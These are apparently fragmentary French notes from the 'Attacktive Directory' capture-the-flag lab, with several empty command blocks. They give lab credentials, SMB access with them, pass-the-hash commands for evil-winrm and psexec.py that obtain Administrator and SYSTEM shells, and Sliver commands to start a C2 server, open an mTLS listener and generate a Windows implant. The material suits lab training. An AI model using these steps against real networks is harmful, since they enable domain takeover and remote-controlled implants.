Professional Documents
Culture Documents
Attackive Directory
Attackive Directory
SHELL
S-1-5-21-3591857110-2884097990-301047963
Explication du protocole kerberos
https://beta.hackndo.com/kerberos/
https://github.com/ropnop/kerbrute
https://raw.githubusercontent.com/Orange-Cyberdefense/ocd-
mindmaps/12341b224aaa2da121cde02651f94c52945156cb/img/pentest_ad_dark
_2023_02.svg
SHELL
SHELL
SHELL
svc-admin:management2005
SHELL
smbclient.py "spookysec.local"/"svc-
admin":"management2005"@"ATTACKTIVEDIREC.spookysec.local"
backup@spookysec.local:backup2517860
Bloodhound
Guide d'utilisation de Bloodhound CE :
https://bloodhound.readthedocs.io/en/latest/data-analysis/bloodhound-
gui.html
https://bloodhound.readthedocs.io/en/latest/data-analysis/nodes.html
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
SHELL
$ evil-winrm -u Administrator -H
0e0363213e37b94221497260b0bcb4fc -i 10.10.196.242 # Accès en
tant que utilisateur Administrator
psexec.py -hashes :"0e0363213e37b94221497260b0bcb4fc"
"SPOOKYSEC.LOCAL"/"Administrator"@"10.10.196.242" # Accès en
tant que NT/Authority System
Commandes sliver
SHELL
## Démarrage du service
sliver-server
## Écoute en mtls
[server] sliver > mtls
## Génération d'un implant
[server] sliver > generate --mtls LHOST --save
/path/2/save/implant --os Windows